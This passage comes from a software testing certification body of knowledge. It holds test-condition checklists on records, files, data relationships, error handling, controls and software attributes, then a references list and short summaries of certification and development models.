conditions have been tested?
15. Have you reviewed requirements to
determine all valid conditions have been
tested?
16. Have you verified with the owner of the
data element that all valid conditions
have been tested?
RESPONSE
# Item
Yes No N/A Comments
1. Has a condition been prepared to test
the processing of the first record?
2. Has a condition been determined to
validate the processing of the last
record?
3. If there are multiple records per
transaction, are they all processed
correctly?
4. If there are multiple records on a
storage media (i.e., permanent or
temporary file), are they all processed
correctly?
5. If there are variations in size of record,
are all those size variations tested (e.g.,
a header with variable length trailers)?
6. Can two records with the same identifier
be processed (e.g., two payments for
the same accounts receivables file)?
7. Can the first record stored be retrieved?
8. Can the last record stored be retrieved?
9. Will all the records entered be properly
stored?
10. Can all of the records stored be
retrieved?
11. Do current record formats coincide with
the formats used on files created by
other systems?
RESPONSE
# Item
Yes No N/A Comments
1. Has a condition been prepared to test
each file?
2. Has a condition been prepared to test
each file’s interface with each module?
3. Have test conditions been prepared to
validate access to each file in different
environments (e.g., web, mobile,
batch)?
4. Has a condition been prepared to
validate that the correct version of each
file will be used?
5. Have conditions been prepared that
will validate that each file will be
properly closed after the last record has
been processed for that file?
6. Have conditions been prepared that will
validate that each record type can be
processed from beginning to end of the
system intact?
7. Have conditions been prepared to
validate that all of the records entered
will be processed through the system?
8. Are test conditions prepared to create a
file for which no prior records exist?
9. Has a condition been prepared to
validate the correct closing of a file
when all records on the file have been
deleted?
RESPONSE
# Item
Yes No N/A Comments
1. Has a data element relationship test
matrix been prepared?
2. Has the relationship matrix been
verified for accuracy and completeness
with the end user/customer/BA of the
system?
3. Has the relationship matrix been
verified for accuracy and completeness
with the project leader of the system?
4. Does the test relationship matrix include
the following relationships:
a. Value of one field related to the
value in another field
b. Range of values in one field
related to a value in another
field
c. Including a value in one field
requires the inclusion of a value
in another field
d. The absence of a value in one
field causes the absence of a
value in another field
e. The presence of a value in one
field causes the absence of
certain values in another field
(for example, the existence of a
particular customer type might
exclude the existence of a
specific product in another field,
such as a retail customer may
not buy a commercial product)
f. The value in one field is
inconsistent with past values for
that field (for example, a
customer who normally buys
in a quantity of two or three now
has a purchase quantity of 600)
g. The value in one field is
inconsistent with what would
logically be expected for an
area/activity (for example, it
may be inconsistent for people
in a particular department to
work and be paid for overtime)
h. The value in one field is
unrealistic for that field (for
example, for hours worked
overtime, 83 might be an
unrealistic value for that field;
this is a relationship between the
field and the value in the field)
i. Relationships between time
periods and conditions (for
example, bonuses might only
be paid during the last week of
a quarter)
j. Relationships between time of
day and processing occurring
(for example, a teller
transaction occurring other than
normal banking hours)
5. Have conditions been prepared for all
relationships that have a significant
impact on the application?
RESPONSE
# Item
Yes No N/A Comments
1. Has a brainstorming session with end
users/customers been performed to
identify functional errors?
2. Has a brainstorming session been
conducted with project personnel to
identify structural error conditions?
3. Have functional error conditions been
identified for the following cases:
a. Rejection of invalid codes
b. Rejection of out-of-range
values
c. Rejection of improper data
relationships
d. Rejections of invalid dates
e. Rejections of unauthorized
transactions of the following
types:
•. Not a valid value
•. Not a valid customer
•. Not a valid product
•. Not a valid transaction type
•. Not a valid price
f. Alphabetic data in numeric
fields
g. Blanks in a numeric field
h. All blank conditions in a
numerical field
i. Negative values in a positive
field
j. Positive values in a negative
field
k. Negative balances in a financial
account
l. Numbers in an alphabetic field
m. Blanks in an alphabetic field
n. Values longer than the field
permits
o. Totals which exceed maximum
size of total fields
p. Proper accumulation of totals
(at all levels for multiple level
totals)
q. Incomplete transactions (i.e.,
one or more fields missing)
r. Obsolete data in the field (e.g.,
a code which had been valid
but is no longer valid)
s. New value which will become
acceptable but is not
acceptable at the current time
(e.g., a new district code for
which the district has not yet
been established)
t. A postdated transaction
u. Change of a value which affects
a relationship (e.g., if the unit
digit was used to control year,
then the switching from nine in
89 to zero in 90 can be
adequately processed)
4. Has the data dictionary list of field
specifications been used to generate
invalid specifications?
5. Have the following architectural error
conditions been tested:
a. Page overflow
b. Report format conformance to
design layout
c. Posting of data in correct
portion of reports
d. Printed error messages are
representative of actual error
condition
e. All instructions are executed
f. All paths are executed
g. All internal tables are tested
h. All loops are tested
i. All “perform” type of routines
have been adequately tested
j. All compiler warning messages
have been adequately
addressed
k. The correct version of the
program has been tested
l. Unchanged portions of the
system will be revalidated after
any part of the system has
been changed
RESPONSE
# Item
Yes No N/A Comments
1. Have all of the end user actions been
identified?
2. Have the actions been identified in
enough detail that the contributions of
information system outputs can be
related to those actions?
3. Has all of the information utilized in
taking an action been identified and
related to the action?
4. Have the outputs from the application
under test been identified to the specific
actions?
5. Does the end user correctly understand
the output reports/screens?
6. Does the end user understand the type
of logic/computation performed in
producing those outputs?
7. Is the end user able to identify the
contribution those outputs make to the
actions taken?
8. Has the relationship between the
system outputs and business actions
been defined?
9. Does the interpretation of the matrix
indicate that the end user does not have
adequate information to take an action?
RESPONSE
# Item
Yes No N/A Comments
1. Have all the internal tables been
identified?
2. Have all the internal lists of error
messages been identified?
3. Has the search logic been identified?
4. Have all the authorization routines been
identified?
5. Have all the password routines been
identified?
6. Has all the business processing logic
that requires a search been identified?
7. Have the data base search routines
been identified?
8. Have subsystem searches been
identified (for example, finding a tax rate
in a sales tax subsystem)?
9. Has a complex search logic been
identified (i.e., that requiring two or
more conditions or two or more records
such as searching for accounts over 90
days old and over $100)?
10. Have test conditions been graded for all
of the above search conditions?
11. Has the end user been interviewed to
determine the type of one-time
searches that might be encountered in
the future?
RESPONSE
# Item
Yes No N/A Comments
1. Have all the files associated with the
application been identified? (Note that
in this condition files include specialized
files, data bases, and internal groupings
of records used for matching and
merging).
2. Have the following merge/match
conditions been addressed:
a. Merge/match of records of two
different identifiers (inserting a
new item, such as a new
employee on the payroll file)
b. A merge/match on which there
are no records on the merged/
matched file
c. A merge/match in which the
merged/matched record
becomes the lowest value on
the file
d. A merge/match in which the
merged/matched record
becomes the highest value on
the file
e. A merge/match in which the
merged/matched record has an
equal value as an item on a file,
for example, adding a new
employee in which the new
employee’s payroll number
equals an existing payroll
number on the file
f. A merge/match for which there
is no input file/transactions
being merged/matched
g. A merge/match in which the
first item on the file is deleted
h. A merge/match in which the last
item on the merged/matched
file is deleted
i. A merge/match in which two
incoming records have the
same value
j. A merge/match in which two
incoming records indicate a
value on the merged/matched
file is to be deleted
k. A merge/match condition when
the last remaining record on the
merged/matched file is deleted
l. A merge/match condition in
which the incoming merged/
matched file is out of the
sequence, or has a single
record out of sequence
3. Have these test conditions been applied
to the totality of merge/match conditions
that can occur in the application under
test?
RESPONSE
# Item
Yes No N/A Comments
1. Have all the desired performance
capabilities been identified?
2. Have all the system features that
contribute to test been identified?
3. Have the following system performance
capabilities been identified:
a. Turnaround performance
b. Availability/up-time
performance
c. Response time performance
d. Error handling performance
e. Report generation performance
f. Internal computational
performance
4. Have the following system features
been identified which may adversely
affect performance:
a. Internal computer processing
speed
b. Efficiency of programming
language
c. Efficiency of data base
management system
d. File storage capabilities
5. Do the project personnel agree that the
stress conditions are realistic to validate
software performance?
RESPONSE
# Item
Yes No N/A Comments
1. Have the business transactions
processed by the software been
identified?
2. Has a transaction flow analysis been
made for each transaction?
3. Have the controls over the transaction
flow been documented?
4. Do the data input controls address the
following areas:
a. Do they ensure the accuracy of
data input?
b. Do they ensure the
completeness of data input?
c. Do they ensure the timeliness
of data input?
d. Are record counts used where
applicable?
e. Are predetermined control
totals used where applicable?
f. Are control logs used where
applicable?
g. Is key verification used where
applicable?
h. Are the input data elements
validated?
i. Are controls in place to monitor
overrides and bypasses?
j. Are overrides and bypasses
restricted to supervisory
personnel?
k. Are overrides and bypasses
automatically recorded and
submitted to supervision for
analysis?
l. Are transaction errors
recorded?
m. Are rejected transactions
monitored to assure that they
are corrected on a timely basis?
n. Are passwords required to
enter business transactions?
o. Are applications shut down
(locked) after predefined
periods of inactivity?
5. Do the data entry controls include the
following controls:
a. Is originated data accurate?
b. Is originated data complete?
c. Is originated data recorded on a
timely basis?
d. Are there procedures and
methods for data origination?
e. Are cross-referenced fields
checked?
f. Are pre-numbered documents
used where applicable?
g. Is there an effective method for
authorizing transactions?
h. Are systems overrides
controlled? Are they
applicable?
i. Are manual adjustments
controlled?
6. Do the processing controls address the
following areas:
a. Are controls over input
maintained throughout
processing?
b. Is all entered data validated?
c. Do overriding/bypass
procedures need to be
manually validated after
processing?
d. Is a transaction history file
maintained?
e. Do procedures exist to control
errors?
f. Are rejected transactions
controlled to assure correction and
reentry?
g. Have procedures been
established to control the
integrity of data files/data
bases?
h. Do controls exist over recording
the correct dates for
transactions?
i. Are there concurrent update
protections procedures?
j. Are easy-to-understand error
messages printed out for each
error condition?
k. Are the procedures for
processing corrected
transactions the same as those
for processing original
transactions?
7. Do the data output controls address the
following items?
a. Are controls in place to assure
the completeness of output?
b. Are output documents reviewed
to ensure that they are
generally acceptable and
complete?
c. Are output documents
reconciled to record counts/
control totals?
d. Are controls in place to ensure
that output products receive the
appropriate security protection?
e. Are output error messages
clearly identified?
f. Is a history maintained of output
product errors?
g. Are users informed of abnormal
terminations?
8. Has the level of risk for each control
area been identified?
9. Has the level of risk been confirmed
with the audit function?
10. Has the end user/customer been
notified of the level of control risk?
RESPONSE
# Item
Yes No N/A Comments
1. Have the software attributes been
identified?
2. Have the software attributes been
ranked?
3. Does the end user/customer agree with
the attribute ranking?
4. Have test conditions been developed
for at least the high importance
attributes?
5. For the correctness attributes, are the
functions validated as accurate and
complete?
6. For the authorization attribute, have the
authorization procedures for each
transaction been validated?
7. For the file integrity attribute, has the
integrity of each file/table been
validated?
8. For the audit trail attribute, have test
conditions validated that each business
transaction can be reconstructed?
9. For the continuity of processing
attribute, has it been validated that the
system can be recovered within a
reasonable time span and that
transactions can be captured and/or
processed during the recovery period?
10. For the service attribute, has it been
validated that turnaround time/response
time meets user needs?
11. For the access control attribute, has it
been validated that only authorized
individuals can gain access to the
system?
12. For the compliance attribute, has it
been validated that IT standards are
complied with, that the system
development methodology is being
followed, and that the appropriate
policies, procedures, and regulations
are complied with?
13. For the reliability attribute, has it been
validated that incorrect, incomplete, or
obsolete data will be processed
properly?
14. For the ease of use attribute, has it
been validated that people can use the
system effectively, efficiently, and
economically?
15. For the maintainable attribute, has it
been validated that the system can be
changed, enhanced with reasonable
effort and on a timely basis?
16. For the portable attribute, has it been
validated that the software can be
moved efficiently to other platforms?
17. For the coupling attribute, has it been
validated that this software system can
properly integrate with other systems?
18. For the performance attribute, has it
been validated that the processing
performance/software performance is
acceptable to the end user?
19. For the ease of operation attribute, has it
been validated that the operation
personnel can effectively, economically,
and efficiently operate the software?
RESPONSE
# Item
Yes No N/A Comments
1. Has the state of an empty master file
been validated?
2. Has the state of an empty transaction
file been validated?
3. Has the state of an empty table been
validated?
4. Has the state of an insufficient quantity
been validated?
5. Has the state of negative balance been
validated?
6. Has the state of duplicate input been
validated?
7. Has the state of entering the same
transaction twice been validated
(particularly from a web app)?
8. Has the state of concurrent update
been validated (i.e., two client systems
calling on the same master record at the
same time)?
RESPONSE
# Item
Yes No N/A Comments
1. Have the backup procedures been
validated?
2. Have the off-site storage procedures
been validated?
3. Have the recovery procedures been
validated?
4. Have the client side operating
procedures been validated?
D
References
It is each candidate’s responsibility to stay current in the field and to be aware of published
works and materials available for professional study and development. Software
Certifications recommends that candidates for certification continually research and stay
aware of current literature and trends in the field. There are many valuable references that
have not been listed here. These references are for informational purposes only.
Ambler, Scott. Web services programming tips and tricks: Documenting a Use Case. October
2000
The American Heritage® Science Dictionary, Copyright © 2002. Published by Houghton
Mifflin. All rights reserved.
Ammann, Paul and Jeff Offutt. Introduction to Software Testing. Cambridge University Press.
Antonopoulos, Nick and Lee Gillam. Cloud Computing. Springer.
Beck, Kent, Mike Beedle, Arie van Bennekum, Alistair Cockburn, Ward Cunningham, Martin
Fowler, James Grenning, Jim Highsmith, Andrew Hunt, Ron Jeffries, Jon Kern, Brian
Marick, Robert C. Martin, Steve Mellor, Ken Schwaber, Jeff Sutherland, Dave
Thomas. 2001, Per the above authors this declaration may be freely copied in any
form, but only in its entirety through this notice.
Beck, Kent. Test Driven Development: By Example. Addison-Wesley Professional, First
Edition, 2002.
Beizer, Boris. Software Testing Techniques. Dreamtech Press, 2002.
Black, Rex. Managing the Testing Process: Practical Tools and Techniques for Managing
Hardware and Software Testing. John Wiley & Sons, Inc., Second Edition, 2002.
Burnstein, Ilene. Practical Software Testing: A Process-Oriented Approach. Springer, 2003.
Copeland, Lee. A Practitioner’s Guide to Software Test Design. Artech House Publishers,
2003.
Craig, Rick D. and Stefan P. Jaskiel. Systematic Software Testing. Artech House Publishers,
2002.
Desikan, Srinivasan and Gopalaswamy Ramesh. Software Testing: Principles and Practice.
Pearson Education, 2006.
Dictionary.com Unabridged. Based on the Random House Dictionary, © Random House, Inc.
2014.
Dustin, Elfriede, et al. Quality Web Systems: Performance, Security, and Usability. Addison-
Wesley, First Edition, 2001.
Erl, Thomas. Service-oriented Architecture: Concepts, Technology, and Design. Pearson
Education, 2005.
Everett, Gerald D., Raymond McLeod Jr. Software Testing: Testing Across the Entire
Software Development Life Cycle. John Wiley & Sons.
Galin, Daniel. Software Quality Assurance: From Theory to Implementation. Pearson
Education, 2009.
Hetzel, Bill. Software Testing: A Standards-Based Guide. John Wiley & Sons, Ltd., 2007.
Holler, J., et al. From Machine-to-Machine to the Internet of Things: Introduction to a New
Age of Intelligence. Academic Press, 2014.
Hurwitz, Judith, Robin Bloor, Marcia Kaufman, and Fern Halper. Service Oriented
Architecture (SOA) For Dummies. John Wiley and Sons, Second Edition.
Joiner, Brian. “Stable and Unstable Processes, Appropriate and Inappropriate Managerial
Action.” From an address given at a Deming User’s Group Conference in Cincinnati,
OH.
Jorgensen, Paul C. Software Testing: A Craftsman’s Approach. CRC Press, Second Edition,
2002.
Kand, Frank. A Contingency Based Approach to Requirements Elicitation and Systems
Development. London School of Economics, J. System Software 1998
Kaner, Cem. An Introduction to Scenario Testing. Florida Tech, June 2003.
Kaner, Cem, et al. Lessons Learned in Software Testing. John Wiley & Sons, Inc., First
Edition, 2001.
Lewis, William E. Software Testing and Continuous Quality Improvement. CRC Press, Third
Edition, 2010.
Li, Kanglin. Effective Software Test Automation: Developing an Automated Software Testing
Tool. Sybex Inc., First Edition, 2004.
Limaye. Software Testing: Principles, Techniques, and Tools. Tata McGraw Hill, 2009.
Marshall, Steve, et al. Making E-Business Work: A Guide to Software Testing in the Internet
Age. Newport Press Publications, 2000.
Recertification is crucial for software testing professionals to ensure their skills remain current with today's challenges. The International Software Certification Board requires testers to complete 120 hours of testing-related training every three years. This process encourages self-improvement and skill enhancement, ensuring professionals remain competitive and effective in their roles while maintaining the certification.
The V-Model enhances defect identification and removal by integrating verification tests into all stages of development. It allows test planning activities to start early in the project, running in parallel with requirements detailing. Verification techniques are utilized throughout the project to ensure defects are identified and removed in the stage of origin, resulting in shorter time to market, lower error correction costs, and fewer defects in the production system.
Software testing certification can improve value to co-workers by encouraging mentoring, sharing of knowledge, and skill enhancement among team members. Certified professionals often conduct training, encourage staff to seek certification, and serve as valuable resources for testing-related information, enhancing the overall competence and productivity of the team.
Candidates must satisfy educational and professional prerequisites, subscribe to the Code of Ethics, and review the Software Testing Body of Knowledge to identify areas requiring further study. Additionally, candidates need to have current experience in the relevant field and a significant breadth of knowledge to ensure they are well-prepared for the certification examination.
The Ad-hoc development model can lead to unpredictable process capabilities due to constant changes and modifications as work progresses. This approach results in inconsistent schedules, budgets, functionality, and product quality. Success may rely heavily on individual skill rather than a repeatable organization-wide method, risking long-term productivity, quality improvement, and organizational capability.
Key advantages of a comprehensive test plan include improved test coverage, avoidance of repetition, increased test efficiency, and a reduction in test numbers without missing defects. It prevents oversights, improves communication, provides education on test details, and fosters accountability. As a contract and roadmap, it defines the testing scope, ensuring clarity regarding in-scope and out-of-scope activities.
The Incremental Model enhances the development process by subdividing requirements into smaller, manageable projects called increments, allowing for partial products with real functionality to be delivered early. This results in faster delivery of functional software in contrast to the Waterfall Model, which often only delivers a complete product at the end of the cycle. Additionally, the Incremental Model allows modifications and iterations after each increment, making it adaptable to changing requirements, whereas the Waterfall Model follows a rigid sequential approach with minimal flexibility to accommodate feedback once a phase is complete. Each incremental delivery provides opportunities for testing and validation of functionality, improving the ability to address defects and requirements changes earlier in the process, thereby reducing risks and enhancing overall quality.
The strategic role of test planning in software testing is to serve as a foundational contract and roadmap for testing activities. A test plan outlines what will be tested, how it will be tested, the resources required, the schedule for testing activities, and potential risks involved. It ensures all stakeholders are aligned on the testing scope and objectives, improving communication and providing a basis for accountability. Test planning aids in integrating testing with the overall software development process by aligning the test schedule, budget, and resources with the overall project plan. It also helps improve test coverage and efficiencies, reducing the likelihood of missing defects without increasing the number of tests. Furthermore, test planning involves the strategic arrangement of items like test data, test environment, and communication mechanisms. By doing so, it supports the systematic execution of tests and allows the test process to evolve as conditions change.
The iterative development model addresses limitations of the Waterfall Model by allowing for more flexibility and adaptability during the development process. Unlike the rigid, linear approach of the Waterfall Model, which struggles with accommodating changes once the project is underway, the Iterative Model divides the project into small parts, enabling earlier demonstration of results and integration of user feedback. This flexibility is crucial as it acknowledges the often inevitable evolution of user requirements and project specifications during development. Furthermore, the Iterative Model is more resilient to the initial uncertainty surrounding requirements since it does not require complete information up front, allowing continuous refinement of the system through successive iterations. The model also shortens the time to deliver functional software to users, helping to meet their needs more rapidly compared to the long, inflexible processes of the Waterfall Model.
The primary goals of the Software Testing Certification Program established by the International Software Certification Board (ISCB) include defining the tasks associated with software testing duties to evaluate skill mastery, demonstrating an individual's willingness to improve professionally, acknowledging attainment of a standard of professional competency, aiding organizations in selecting and promoting qualified individuals, motivating personnel to maintain their professional competency, and assisting individuals in enhancing their organization's software testing programs.